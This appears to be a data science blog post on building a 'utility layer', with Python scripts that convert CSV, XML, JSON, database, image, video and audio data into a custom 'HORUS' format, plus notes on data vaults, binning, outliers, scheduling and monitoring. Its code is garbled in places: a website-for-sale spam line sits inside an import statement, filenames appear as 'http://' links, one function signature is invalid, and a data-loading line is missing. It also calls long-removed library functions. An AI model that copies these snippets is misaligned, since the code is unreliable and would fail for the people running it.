types of utilities • Data processing utilities • Maintenance utilities • Processing utilities ## Data Processing Utilities Data processing utilities are grouped for the reason that they perform some form of data transformation within the solutions. ### Retrieve Utilities Utilities for this super step contain the processing chains for retrieving data out of the raw data lake into a new structured format. I suggest that you build all your retrieve utilities to transform the external raw data lake format into the Homogeneous Ontology for Recursive Uniform Schema (HORUS) data format that I have been using in my projects. HORUS is my core data format. It is used by my data science framework, to enable the reduction of development work required to achieve a complete solution that handles all data formats. If you prefer, create your own format, but feel free to use mine. For demonstration purposes, I have selected the HORUS format to be CSV-based. I would normally use a JSON-based Hadoop ecosystem, or a distributed database such as Cassandra, to hold the core HORUS format. Tip Check the sample directory C:\VKHCG\05-DS\9999-Data\ for the subsequent code and data. I recommend the following retrieve utilities as a good start. ### Text-Delimited to HORUS These utilities enable your solution to import text-based data from your raw data sources. Example: This utility imports a list of countries in CSV file format into HORUS format. # Utility Start CSV to HORUS # Standard Tools #====== import pandas as pd # Input Agreement ==== sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.csv' InputData=pd.read_csv(sInputFileName,encoding="latin-1") print('Input Data Values ===================================') print(InputData) print('==========') # Processing Rules === ProcessData=InputData # Remove columns ISO-2-Code and ISO-3-CODE ProcessData.drop('ISO-2-CODE', axis=1,inplace=True) ProcessData.drop('ISO-3-Code', axis=1,inplace=True) # Rename Country and ISO-M49 ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True) ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True) # Set new Index ProcessData.set_index('CountryNumber', inplace=True) # Sort data by CurrencyNumber ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True) print('Process Data Values =====') print(ProcessData) print('============') # Output Agreement ======== OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-CSV-Country.csv' OutputData.to_csv(sOutputFileName, index = False) print('CSV to HORUS - Done') # Utility done ======== ### XML to HORUS These utilities enable your solution to import XML-based data from your raw data sources. Example: This utility imports a list of countries in XML file format into HORUS format. # Utility Start XML to HORUS ======== # Standard Tools #============= import pandas as pd import xml.etree.ElementTree as ET #===========def df2xml(data): header = data.columns root = ET.Element('root') for row in range(data.shape[0]): entry = ET.SubElement(root,'entry') for index in range(data.shape[1]): schild=str(header[index]) child = ET.SubElement(entry, schild) if str(data[schild][row]) != 'nan': child.text = str(data[schild][row]) else: child.text = 'n/a' entry.append(child) result = ET.tostring(root) return result def xml2df(xml:data): root = ET.XML(xml:data) all_records = [] for i, child in enumerate(root): record = {} for subchild in child: record[subchild.tag] = subchild.text all_records.append(record) return pd.DataFrame(all_records) # Input Agreement ===== #=============== sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.xml' InputData = open(sInputFileName).read() print('=========================') print('Input Data Values ===========') print('============') print(InputData) print('=====================================================') # Processing Rules =========================================== ProcessDataXML=InputData # XML to Data Frame ProcessData=xml2df(ProcessDataXML) # Remove columns ISO-2-Code and ISO-3-CODE ProcessData.drop('ISO-2-CODE', axis=1,inplace=True) ProcessData.drop('ISO-3-Code', axis=1,inplace=True) # Rename Country and ISO-M49 ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True) ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True) # Set new Index ProcessData.set_index('CountryNumber', inplace=True) # Sort data by CurrencyNumber ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True) print('========') print('Process Data Values ======') print('===') print(ProcessData) print('=======') # Output Agreement OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-XML-Country.csv' OutputData.to_csv(sOutputFileName, index = False) print('====') print('XML to HORUS - Done') print('======') # Utility done == ### JSON to HORUS These utilities enable your solution to import XML-based data from your raw data sources. I will demonstrate this utility in blog 7, with sample data. Example: This utility imports a list of countries in JSON file format into HORUS format. # Utility Start JSON to HORUS ======= # Standard Tools #================= import pandas as pd # Input Agreement ======= sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.json' InputData=pd.read_json(sInputFileName, orient='index', encoding="latin-1") print('Input Data Values ======') print(InputData) print('=======================') # Processing Rules ====== ProcessData=InputData # Remove columns ISO-2-Code and ISO-3-CODE ProcessData.drop('ISO-2-CODE', axis=1,inplace=True) ProcessData.drop('ISO-3-Code', axis=1,inplace=True) # Rename Country and ISO-M49 ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True) ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True) # Set new Index ProcessData.set_index('CountryNumber', inplace=True) # Sort data by CurrencyNumber ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True) print('Process Data Values =======') print(ProcessData) print('==========') # Output Agreement ====== OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-JSON-Country.csv' OutputData.to_csv(sOutputFileName, index = False) print('JSON to HORUS - Done') # Utility done ======== ### Database to HORUS These utilities enable your solution to import data from existing database sources. Example: This utility imports a list of countries in SQLite data format into HORUS format. # Utility Start Database to HORUS ====== # Standard Tools #================= import pandas as pd import sqlite3 as sq # Input Agreement ========= sInputFileName='C:/VKHCG/05-DS/9999-Data/utility.db' sInputTable='Country_Code' conn = sq.connect(sInputFileName) sSQL='select * FROM ' + sInputTable + ';' InputData=pd.read_sql_query(sSQL, conn) print('Input Data Values ========') print(InputData) print('===================') # Processing Rules =========== ProcessData=InputData # Remove columns ISO-2-Code and ISO-3-CODE ProcessData.drop('ISO-2-CODE', axis=1,inplace=True) ProcessData.drop('ISO-3-Code', axis=1,inplace=True) # Rename Country and ISO-M49 ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True) ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True) # Set new Index ProcessData.set_index('CountryNumber', inplace=True) # Sort data by CurrencyNumber ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True) print('Process Data Values ==========') print(ProcessData) print('====================') # Output Agreement ==== OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-CSV-Country.csv' OutputData.to_csv(sOutputFileName, index = False) print('Database to HORUS - Done') # Utility done =============================================== There are also additional expert utilities that you may want. ### Picture to HORUS These expert utilities enable your solution to convert a picture into extra data. These utilities identify objects in the picture, such as people, types of objects, locations, and many more complex data features. Example: This utility imports a picture of a dog called Angus in JPG format into HORUS format. # Utility Start Picture to HORUS # Standard Tools #=============== from scipy.misc import imread import pandas as pd import matplotlib.pyplot as plt import numpy as np # Input Agreement sInputFileName='C:/VKHCG/05-DS/9999-Data/Angus.jpg' InputData = imread(sInputFileName, flatten=False, mode='RGBA') print('Input Data Values ============') print('X: ',InputData.shape[0]) print('Y: ',InputData.shape[1]) print('RGBA: ', InputData.shape[2]) print('======================') # Processing Rules ============= ProcessRawData=InputData.flatten() y=InputData.shape[2] + 2 x=int(ProcessRawData.shape[0]/y) ProcessData=pd.DataFrame(np.reshape(ProcessRawData, (x, y))) sColumns= ['XAxis','YAxis','Red', 'Green', 'Blue','Alpha'] ProcessData.columns=sColumns ProcessData.index.names =['ID'] print('Rows: ',ProcessData.shape[0]) print('Columns :',ProcessData.shape[1]) print('=================') print('Process Data Values =============') print('======================') plt.imshow(InputData) plt.show() print('======================') # Output Agreement ======== OutputData=ProcessData print('Storing File') sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Picture.csv' OutputData.to_csv(sOutputFileName, index = False) print('====================') print('Picture to HORUS - Done') print('======================') # Utility done Video to HORUS These expert utilities enable your solution to convert a video into extra data. These utilities identify objects in the video frames, such as people, types of objects, locations, and many more complex data features. Example: This utility imports a movie in MP4 format into HORUS format. The process is performed in two stages. Movie to Frames # Utility Start Movie to HORUS (Part 1) ====================== # Standard Tools #============================================================= import os import shutil import cv2 #============================================================= sInputFileName='C:/VKHCG/05-DS/9999-Data/dog.mp4' sDataBaseDir='C:/VKHCG/05-DS/9999-Data/temp' if os.path.exists(sDataBaseDir): shutil.rmtree(sDataBaseDir) if not os.path.exists(sDataBaseDir): os.makedirs(sDataBaseDir) print('=====================================================') print('Start Movie to Frames') print('=====================================================') vidcap = cv2.VideoCapture(sInputFileName) success,image = vidcap.read() count = 0 while success: success,image = vidcap.read() sFrame=sDataBaseDir + str('/dog-frame-' + str(format(count, '04d')) + '.jpg') print('Extracted: ', sFrame) cv2.imwrite(sFrame, image) if os.path.getsize(sFrame) == 0: count += -1 os.remove(sFrame) print('Removed: ', sFrame) if cv2.waitKey(10) == 27: # exit if Escape is hit break count += 1 print('=====================================================') print('Generated : ', count, ' Frames') print('=====================================================') print('Movie to Frames HORUS - Done') print('=====================================================') # Utility done =============================================== I have now created frames and need to load them into HORUS. Frames to Horus # Utility Start Movie to HORUS (Part 2) ====================== # Standard Tools #============================================================= from scipy.misc import imread import pandas as pd import matplotlib.pyplot as plt import numpy as np import os # Input Agreement ============================================ sDataBaseDir='C:/VKHCG/05-DS/9999-Data/temp' f=0 for file in os.listdir(sDataBaseDir): if file.endswith(".jpg"): f += 1 sInputFileName=os.path.join(sDataBaseDir, file) print('Process : ', sInputFileName) InputData = imread(sInputFileName, flatten=False, mode='RGBA') print('Input Data Values ===================================') print('X: ',InputData.shape[0]) print('Y: ',InputData.shape[1]) print('RGBA: ', InputData.shape[2]) print('=====================================================') # Processing Rules =========================================== ProcessRawData=InputData.flatten() y=InputData.shape[2] + 2 x=int(ProcessRawData.shape[0]/y) ProcessFrameData=pd.DataFrame(np.reshape(ProcessRawData, (x, y))) ProcessFrameData['Frame']=file print('=====================================================') print('Process Data Values =================================') print('=====================================================') plt.imshow(InputData) plt.show() if f == 1: ProcessData=ProcessFrameData else: ProcessData=ProcessData.append(ProcessFrameData) if f > 0: sColumns= ['XAxis','YAxis','Red', 'Green', 'Blue','Alpha','FrameName'] ProcessData.columns=sColumns print('=====================================================') ProcessFrameData.index.names =['ID'] print('Rows: ',ProcessData.shape[0]) print('Columns :',ProcessData.shape[1]) print('=====================================================') # Output Agreement =========================================== OutputData=ProcessData print('Storing File') sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Movie-Frame.csv' OutputData.to_csv(sOutputFileName, index = False) print('=====================================================') print('Processed ; ', f,' frames') print('=====================================================') print('Movie to HORUS - Done') print('=====================================================') # Utility done =============================================== Audio to HORUS These expert utilities enable your solution to convert an audio into extra data. These utilities identify objects in the video frames, such as people, types of objects, locations, and many more complex data features. Example: This utility imports a set of audio files in WAV format into HORUS format. # Utility Start Audio to HORUS =============================== # Standard Tools #============================================================= from scipy.io - This website is for sale! - cloud server monitoring Resources and Information. import wavfile import pandas as pd import matplotlib.pyplot as plt import numpy as np #============================================================= def show_info(aname, a,r): print ('----------------') print ("Audio:", aname) print ('----------------') print ("Rate:", r) print ('----------------') print ("shape:", a.shape) print ("dtype:", a.dtype) print ("min, max:", a.min(), a.max()) print ('----------------') plot_info(aname, a,r) #============================================================= def plot_info(aname, a,r): sTitle= 'Signal Wave - '+ aname + ' at ' + str(r) + 'hz' plt.title(sTitle) sLegend=[] for c in range(a.shape[1]): sLabel = 'Ch' + str(c+1) sLegend=sLegend+[str(c+1)] plt.plot(a[:,c], label=sLabel) plt.legend(sLegend) plt.show() #======= sInputFileName='C:/VKHCG/05-DS/9999-Data/2ch-sound.wav' print('===============') print('Processing : ', sInputFileName) print('==========') InputRate, InputData = wavfile.read(sInputFileName) show_info("2 channel", InputData,InputRate) ProcessData=pd.DataFrame(InputData) sColumns= ['Ch1','Ch2'] ProcessData.columns=sColumns OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-2ch.csv' OutputData.to_csv(sOutputFileName, index = False) #============================================================= sInputFileName='C:/VKHCG/05-DS/9999-Data/4ch-sound.wav' print('=====================================================') print('Processing : ', sInputFileName) print('=====================================================') InputRate, InputData = wavfile.read(sInputFileName) show_info("4 channel", InputData,InputRate) ProcessData=pd.DataFrame(InputData) sColumns= ['Ch1','Ch2','Ch3', 'Ch4'] ProcessData.columns=sColumns OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-4ch.csv' OutputData.to_csv(sOutputFileName, index = False) sInputFileName='C:/VKHCG/05-DS/9999-Data/6ch-sound.wav' print('=====================================================') print('Processing : ', sInputFileName) print('=====================================================') InputRate, InputData = wavfile.read(sInputFileName) show_info("6 channel", InputData,InputRate) ProcessData=pd.DataFrame(InputData) sColumns= ['Ch1','Ch2','Ch3', 'Ch4', 'Ch5','Ch6'] ProcessData.columns=sColumns OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-6ch.csv' OutputData.to_csv(sOutputFileName, index = False) sInputFileName='C:/VKHCG/05-DS/9999-Data/8ch-sound.wav' print('=====================================================') print('Processing : ', sInputFileName) print('=====================================================') InputRate, InputData = wavfile.read(sInputFileName) show_info("8 channel", InputData,InputRate) ProcessData=pd.DataFrame(InputData) sColumns= ['Ch1','Ch2','Ch3', 'Ch4', 'Ch5','Ch6','Ch7','Ch8'] ProcessData.columns=sColumns OutputData=ProcessData sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-8ch.csv' OutputData.to_csv(sOutputFileName, index = False) print('=====================================================') print('Audio to HORUS - Done') print('=====================================================') # Utility done ===== ### Data Stream to HORUS These expert utilities enable your solution to handle data streams. Data streams are evolving as the fastest-growing data collecting interface at the edge of the data lake. I will offer extended discussions and advice later in the blog on the use of data streaming in the data science ecosystem. Tip i use a package called python-confluent-kafka for my Kafka streaming requirements. I have also used PyKafka with success. In the Retrieve super step of the functional layer, I dedicate more text to clarifying how to use and generate full processing chains to retrieve data from your data lake, using optimum techniques Assess Utilities Utilities for this super step contain all the processing chains for quality assurance and additional data enhancements. The assess utilities ensure that the data imported via the Retrieve super step are of a good quality, to ensure it conforms to the prerequisite standards of your solution. I perform feature engineering at this level, to improve the data for better processing success in the later stages of data processing. There are two types of assessing utilities: ### Feature Engineering Feature engineering is the process by which you enhance or extract data sources, to enable better extraction of characteristics you are investigating in the data sets. Following is a small subset of the utilities you may use. Fixers Utilities Fixers enable your solution to take your existing data and fix a specific quality issue. Examples include Removing leading or lagging spaces from a data entry The example in Python: baddata = " Data Science with too many spaces is bad!!! " print('>',baddata,'<') cleandata=baddata.strip() print('>',cleandata,'<') Removing nonprintable characters from a data entry Example in Python: import string printable = set(string.printable) baddata = "Data\x00Science with\x02 funny characters is \x10bad!!!" cleandata=''.join(filter(lambda x: x in string.printable, baddata)) print(cleandata) Reformatting data entry to match specific formatting criteria. Convert 2017/01/31 to 31 January 2017 The example in Python: import datetime as dt baddate = dt.date(2017, 1, 31) baddata=format(baddate,'%Y-%m-%d') print(baddata) gooddate = dt.datetime.strptime(baddata,'%Y-%m-%d') gooddata=format(gooddate,'%d %B %Y') print(gooddata) Adders Utilities Adders use existing data entries and then add additional data entries to enhance your data. Examples include Utilities that look up extra data against existing data entries in your solution. A utility can use the United Nations’ ISO M49 for the countries list, to look up 826, to set the country name to the United Kingdom. Another utility uses ISO alpha-2 lookup to GB to return the country came back to the United Kingdom. Zoning data that is added by extra data entries based on a test. The utility can indicate that the data entry is valid, i.e., you found the code in the lookup. A utility can indicate that your data entry for bank balance is either in the black or the red. ### Process Utilities Utilities for this super step contain all the processing chains for building the data vault. I will discuss the data vault’s (Time, Person, Object, Location, Event) design, model, and inner workings in detail during the Process super step of the functional layer. For the purposes of this blog, I will at this point introduce the data vault as a data structure that uses well-structured design to store data with full history. The basic elements of the data vault are hubs, satellites, and links. There are three basic process utilities. #### Data Vault Utilities The data vault is a highly specialist data storage technique that was designed by Dan Linstedt. The data vault is a detail-oriented, historical-tracking, and uniquely linked set of normalized tables that support one or more functional areas of business. It is a hybrid approach encompassing the best of breed between 3rd normal form (3NF) and star schema. Hub Utilities Hub utilities ensure that the integrity of the data vault’s (Time, Person, Object, Location, Event) hubs is 100% correct, to verify that the vault is working as designed. Satellite Utilities Satellite utilities ensure the integrity of the specific satellite and its associated hub. Link Utilities Link utilities ensure the integrity of the specific link and its associated hubs. As the data vault is a highly structured data model, the utilities in the Process super step of the functional layer will assist you in building your own solution. ### Transform Utilities Utilities for this super step contain all the processing chains for building the data warehouse from the results of your practical data science. In the Transform super step, the system builds dimensions and facts to prepare a data warehouse, via a structured data configuration, for the algorithms in data science to use to produce data science discoveries. There are two basic transform utilities. ### Dimensions Utilities The dimensions use several utilities to ensure the integrity of the dimension structure. Concepts such as conformed dimension, degenerate dimension, role-playing dimension, mini-dimension, outrigger dimension, slowly changing dimension, late-arriving dimension, and dimension types (0, 1, 2, 3). They all require specific utilities to ensure 100% integrity of the dimension structure. Pure data science algorithms are the most used at this point in your solution. I will discuss extensively what data science algorithms are required to perform practical data science. I will ratify that the most advanced of these are standard algorithms, which will result in common utilities. Facts Utilities These consist of a number of utilities that ensure the integrity of the dimensions structure and the facts. There are various statistical and data science algorithms that can be applied to the facts that will result in additional utilities. Note The most important utilities for your data science will be transformed utilities, as they hold the accredited data science you need for your solution to be successful. ### Data Science Utilities There are several data science–specific utilities that are required for you to achieve success in the data processing ecosystem. Data Binning or Bucketing Binning is a data preprocessing technique used to reduce the effects of minor observation errors. Statistical data binning is a way to group a number of more or less continuous values into a smaller number of “bins.” Example: Open your Python editor and create a file called http://DU-Histogram.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU. Now copy this code into the file, as follows: import numpy as np import matplotlib.mlab as mlab import matplotlib.pyplot as plt np.random.seed(0) # example data mu = 90 # mean of distribution sigma = 25 # standard deviation of distribution x = mu + sigma * np.random.randn(5000) num_bins = 25 fig, ax = plt.subplots() # the histogram of the data n, bins, patches = ax.hist(x, num_bins, normed=1) # add a 'best fit' line y = mlab.normpdf(bins, mu, sigma) ax.plot(bins, y, '--') ax.set_xlabel('Example Data') ax.set_ylabel('Probability density') sTitle=r'Histogram ' + str(len(x)) + ' entries into ' + str(num_bins) + ' Bins:$\mu=' + str(mu) + '$,$\sigma=' + str(sigma) + '\$' ax.set_title(sTitle)
fig.tight_layout()
plt.show()
the binning reduces the 5000 data entries to only 25, with close-to-reality values.
### Averaging of Data
The use of averaging of features value enables the reduction of data volumes in a control fashion to improve effective data processing.
Example: Open your Python editor and create a file called http://DU-Mean.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU. The following code reduces the data volume from 3562 to 3 data entries, which is a 99.91% reduction.
import pandas as pd
InputFileName='IP_DATA_CORE.csv' OutputFileName='Retrieve_Router_Location.csv'
Base='C:/VKHCG'
sFileName=Base + '/01-Vermeulen/00-RawData/' + InputFileName
usecols=['Country','Place Name','Latitude','Longitude'], encoding="latin-1")
IP_DATA_ALL.rename(columns={'Place Name': 'Place_Name'}, inplace=True) AllData=IP_DATA_ALL[['Country', 'Place_Name','Latitude']] print(AllData)
MeanData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].mean()
print(MeanData)
This technique also enables the data science to prevent a common issue called overfitting the model.;
Outlier Detection
Outliers are data that is so different from the rest of the data in the data set that it may be caused by an error in the data source. There is a technique called outlier detection that, with good data science, will identify these outliers.
Example: Open your Python editor and create a file http://DU-Outliers.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU.
import pandas as pd
InputFileName='IP_DATA_CORE.csv' OutputFileName='Retrieve_Router_Location.csv'
Base='C:/VKHCG'
sFileName=Base + '/01-Vermeulen/00-RawData/' + InputFileName
usecols=['Country','Place Name','Latitude','Longitude'], encoding="latin-1")
IP_DATA_ALL.rename(columns={'Place Name': 'Place_Name'}, inplace=True) LondonData=IP_DATA_ALL.loc[IP_DATA_ALL['Place_Name']=='London'] AllData=LondonData[['Country', 'Place_Name','Latitude']] print('All Data')
print(AllData)
MeanData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].mean()
StdData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].std()
print('Outliers')
UpperBound=float(MeanData+StdData)
print('Higher than ', UpperBound)
OutliersHigher=AllData[AllData.Latitude>UpperBound]
print(OutliersHigher)
LowerBound=float(MeanData-StdData)
print('Lower than ', LowerBound)
OutliersLower=AllData[AllData.Latitude<LowerBound] print(OutliersLower) print('Not Outliers') OutliersNot=AllData[(AllData.Latitude>=LowerBound) & (AllData.
Latitude<=UpperBound)]
print(OutliersNot)
Organize Utilities
Utilities for this super step contain all the processing chains for building the data marts. The organize utilities are mostly used to create data marts against the data science results stored in the data warehouse dimensions and facts.
Report Utilities
Utilities for this super step contain all the processing chains for building virtualization and reporting of the actionable knowledge. The report utilities are mostly used to create data virtualization against the data science results stored in the data marts.
### Maintenance Utilities
The data science solutions you are building are a standard data system and, consequently, require maintenance utilities, as with any other system. Data engineers and data scientists must work together to ensure that the ecosystem works at its most efficient level at all times.
Utilities cover several areas.
### Backup and Restore Utilities
These perform different types of database backups and restores for the solution. They are standard for any computer system. For the specific utilities, I suggest you have an in- depth discussion with your own systems manager or the systems manager of your client.
I normally provide a wrapper for the specific utility that I can call in my data science ecosystem, without direct exposure to the custom requirements at each customer.
Checks Data Integrity Utilities
These utilities check the allocation and structural integrity of database objects and indexes across the ecosystem, to ensure the accurate processing of the data into knowledge.
### History Cleanup Utilities
These utility archive and remove entries in the history tables in the databases.
Note The “right-to-be-forgotten” statute in various countries around the world imposes multifaceted requirements in this area of data science to be able to implement selective data processing.
Warning I suggest you look at your information protection laws in detail, because the processing of data now via data science is becoming highly exposed, and in a lot of countries, fines are imposed if you get these processing rules wrong.
#### Maintenance Cleanup Utilities
These utilities remove artifacts related to maintenance plans and database backup files.
Notify Operator Utilities
Utilities that send notification messages to the operations team about the status of the system are crucial to any data science factory.
Rebuild Data Structure Utilities
These utilities rebuild database tables and views to ensure that all the development is as designed. In blogs 6–11, I will discuss the specific rebuild utilities.
#### Reorganize Indexing Utilities
These utilities reorganize indexes in database tables and views, which is a major operational process when your data lake grows at a massive volume and velocity. The variety of data types also complicates the application of indexes to complex data structures.
As a data scientist, you must understand when and how your data sources will change. An unclear indexing strategy could slow down algorithms without your taking note, and you could lose data, owing to your not handling the velocity of the data flow.
Shrink/Move Data Structure Utilities
These reduce the footprint size of your database data and associated log artifacts, to ensure an optimum solution is executing.
Solution Statistics Utilities
These utilities update information about the data science artifacts, to ensure that your data science structures are recorded. Call it data science on your data science.
The preceding list is a comprehensive, but not all-inclusive. I suggest that you speak to your development and operations organization staff, to ensure that your data science solution fits into the overall data processing structures of your organization.
#### Processing Utilities
The data science solutions you are building require processing utilities to perform standard system processing. The data science environment requires two basic processing utility types.
Scheduling Utilities
The scheduling utilities I use are based on the basic agile scheduling principles.
Backlog Utilities
Backlog utilities accept new processing requests into the system and are ready to be processed in future processing cycles.
To-Do Utilities
The to-do utilities take a subset of backlog requests for processing during the next processing cycle. They use classification labels, such as priority and parent-child relationships, to decide what process runs during the next cycle.
Doing Utilities
The doing utilities execute the current cycle’s requests.
Done Utilities
The done utilities confirm that the completed requests performed the expected processing.
Monitoring Utilities
The monitoring utilities ensure that the complete system is working as expected.
Engineering a Practical Utility Layer
The utility layer holds all the utilities you share across the data science environment. I suggest that you create three sublayers to help the utility layer support the better future use of the utilities.
### Maintenance Utility
Collect all the maintenance utilities in this single directory, to enable the environment to handle the utilities as a collection.
I suggest that you keep a maintenance utility registry, to enable your entire team to use the common utilities. Include enough documentation for each maintenance utility, to explain its complete workings and requirements.
Data Utility
Collect all the data utilities in this single directory, to enable the environment to handle the utilities as a collection. I suggest that you keep a data utility registry to enable your entire team to use the common utilities. Include enough documentation for each data utility to explain its complete workings and requirements.
### Processing Utility
Collect all the processing utilities in this single directory to enable the environment to handle the utilities as a collection.
I suggest that you keep a processing utility registry, to enable your entire team to use the common utilities. Include sufficient documentation for each processing utility to explain its complete workings and requirements.
Warning Ensure that you support your company’s processing environment and that the suggested environment supports an agile processing methodology. This may not always match your own environment.
Caution Remember: These utilities are used by your wider team, if you interrupt them, you will pause other current working processing. Take extra care with this layer’s artifacts.
#### Three Management Layers
This blog is about the three management layers that are must-haves for any large-scale data science system. I will discuss them at a basic level. I suggest you scale-out these management capabilities, as your environment grows.
Operational Management Layer
The operational management layer is the core store for the data science ecosystem’s complete processing capability. The layer stores every processing schedule and workflow for the all-inclusive ecosystem.
• This area enables you to see a singular view of the entire ecosystem. It reports the status of the processing.
• The operations management layer is the layer where I record the following.
### Processing-Stream Definition and Management
The processing-stream definitions are the building block of the data science ecosystem. I store all my current active processing scripts in this section.
Definition management describes the workflow of the scripts through the system, ensuring that the correct execution order is managed, as per the data scientists’ workflow design.
Tip Keep all your general techniques and algorithms in a source-control-based system, such as GitHub or SVN, in the format of importable libraries. That way, you do not have to verify if they work correctly every time you use them.
The advice I spend 10% of my time generating new processing building blocks every week and 10% improving existing building blocks.
I can confirm that this action easily saves more than 20% of my time on processing new data science projects when I start them, as I already have a base set of tested code to support the activities required. So, please invest in your own and your team’s future, by making this a standard practice for the team. You will not regret the investment.
Warning When you replace existing building blocks, check for impacts downstream. I suggest you use a simple versioning scheme of mylib_001_01. That way, you can have 999 versions with 99 sub-versions.
This also ensures that your new version can be orderly rolled out into your customer base. The most successful version is to support the process with a good version-control process that can support multiple branched or forked code sets.
### Parameters
The parameters for the processing are stored in this section, to ensure a single location for all the system parameters. You will see in all the following examples that there is an ecosystem setup phase.
if sys.platform == 'linux':
Base=os.path.expanduser('~') + '/VKHCG'
else:
Base='C:/VKHCG'
print('################################')
print('Working Base :',Base, ' using ', sys.platform)
print('################################')
sFileDir=Base + '/01-Vermeulen/01-Retrieve/01-EDS/02-Python' if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileName=Base + '/01-Vermeulen/00-RawData/Country_Currency.xlsx'
In my production system, for each customer, we place all these parameters in a single location and then simply call the single location. Two main designs are used:
• \ 1.\ A simple text file that we then import into every Python script
• \ 2.\ A parameter database supported by a standard parameter setup script that we then include into every script
I will also admit to having several parameters that follow the same format as the preceding examples, and I simply collect them in a section at the top of the code.
Advice Find a way that works best for your team and standardize that method across your team.
### Scheduling
The scheduling plan is stored in this section, to enable central control and visibility of the complete scheduling plan for the system. In my solution, I use a Drum-Buffer-Rope methodology. The principle is simple.
Similar to a troop of people marching, the Drum-Buffer-Rope methodology is a standard practice to identify the slowest process and then use this process to pace the complete pipeline. You then tie the rest of the pipeline to this process to control the eco-system’s speed.
So, you place the “drum” at the slow part of the pipeline, to give the processing pace, and attach the “rope” to the beginning of the pipeline, and the end by ensuring that no processing is done that is not attached to this drum. This ensures that your processes complete more efficiently, as nothing is entering or leaving the process pipe without been recorded by the drum’s beat.
I normally use an independent Python program that employs the directed acyclic graph (DAG) that is provided by the network libraries’ DiGraph structure.
This automatically resolves duplicate dependencies and enables the use of a topological sort, which ensures that tasks are completed in the order of requirement. Following is an example: Open this in your Python editor and view the process.
import networkx as nx
Here you construct your network in any order.
DG = nx.DiGraph([
('Start','Retrieve1'),
('Start','Retrieve2'),
('Retrieve1','Assess1'),
('Retrieve2','Assess2'),
('Assess1','Process'),
('Assess2','Process'),
('Process','Transform'),
('Transform','Report1'),
('Transform','Report2')
])
print("Unsorted Nodes")
print(DG.nodes())
You can test your network for valid DAG.
print("Is a DAG?",nx.is_directed_acyclic_graph(DG))
Now you sort the DAG into a correct order.
sOrder=nx.topological_sort(DG)
print("Sorted Nodes")
print(sOrder)
You can also visualize your network.
pos=nx.spring_layout(DG)
nx.draw_networkx_nodes(DG,pos=pos,node_size = 1000)
nx.draw_networkx_edges(DG,pos=pos)
nx.draw_networkx_labels(DG,pos=pos)
You can add some extra nodes and see how this resolves the ordering. I suggest that you experiment with networks of different configurations, as this will enable you to understand how the process truly assists with the processing workload.
Tip I normally store the requirements for the nodes in a common database. That way, I can upload the requirements for multiple data science projects and resolve the optimum requirement with ease.
### Monitoring
The central monitoring process is in this section to ensure that there is a single view of the complete system. Always ensure that you monitor your data science from a single point. Having various data science processes running on the same ecosystem without central monitoring is not advised.
Tip I always get my data science to simply set an active status in a central table when it starts and a not-active when it completes. That way, the entire team knows who is running what and can plan its own processing better.
If you are running on Windows, try the following:
conda install -c primer wmi
import wmi
c = wmi.WMI ()
for process in c.Win32_Process ():
print (process.ProcessId, http://process.Name)
For Linux, try this
import os
pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
for pid in pids:
try:
print open(os.path.join('/proc', pid, 'cmdline'), 'rb').read() except IOError: # proc has already terminated
continue
This will give you a full list of all running processes. I normally just load this into a table every minute or so, to create a monitor pattern for the ecosystem.
### Communication
All communication from the system is handled in this one section, to ensure that the system can communicate any activities that are happening. We are using a complex communication process via Jira, to ensure we have all our data science tracked. I suggest you look at the Conda install -c condo-forge jira.
I will not provide further details on this subject, as I have found that the internal communication channel in any company is driven by the communication tools it uses. The only advice I will offer is to communicate! You would be alarmed if at least once a week, you lost a project owing to someone not communicating what they are running.
The alerting section uses communications to inform the correct person, at the correct time, about the correct status of the complete system. I use Jira for alerting, and it works well. If any issue is raised, alerting provides complete details of what the status was and the errors it generated.
I will now discuss each of these sections in more detail and offer practical examples of what to expect or create in each section.
#### The audit, Balance, and Control Layer
The audit, balance, and control layer controls any processing currently underway. This layer is the engine that ensures that each processing request is completed by the ecosystem as planned.
The audit, balance, and control layer is the single area in which you can observe what is currently running within your data scientist environment.
It records
• Process-execution statistics
• Balancing and controls
• Rejects- and error-handling
• Fault codes management
The three subareas are utilized in the following manner.
Audit
First, let’s define what I mean by the audit. An audit is a systematic and independent examination of the ecosystem. The audit sublayer records the processes that are running at any specific point within the environment.
This information is used by data scientists and engineers to understand and plan future improvements to the processing.
Tip Make sure your algorithms and processing generate a good and complete audit trail.
My experience shows that a good audit trail is extremely crucial. The use of the built-in audit capability of the data science technology stack’s components supplies you with a rapid and effective base for your auditing. I will discuss what audit statistics are essential to the success of your data science.
